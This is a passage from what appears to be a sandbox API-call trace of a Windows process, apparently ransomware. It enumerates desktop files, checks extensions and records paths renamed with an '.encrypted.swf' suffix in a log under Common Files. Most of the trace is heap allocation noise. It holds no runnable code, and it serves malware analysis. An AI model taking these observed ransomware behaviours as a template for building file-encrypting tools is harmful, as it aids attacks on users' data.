HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\n0tvrnehfm.swf")) returned 1 [0031.790] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x12d570e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 0 [0031.790] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.790] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.790] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.791] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.791] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.791] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.791] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.791] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.791] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.791] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.791] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.792] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.792] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.792] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.792] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.792] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xa65, lpOverlapped=0x0) returned 1 [0031.792] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.792] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xa65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.792] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.encrypted.swf\r\n", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x59) returned 0x87aa40 [0031.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.encrypted.swf\r\n", cchWideChar=89, lpMultiByteStr=0x87aa40, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 89 [0031.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0031.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.792] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x58, lpOverlapped=0x0) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.793] CloseHandle (hObject=0x140) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.794] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.794] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.795] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.795] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.795] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.795] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.795] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.798] RtlAllocateHeap 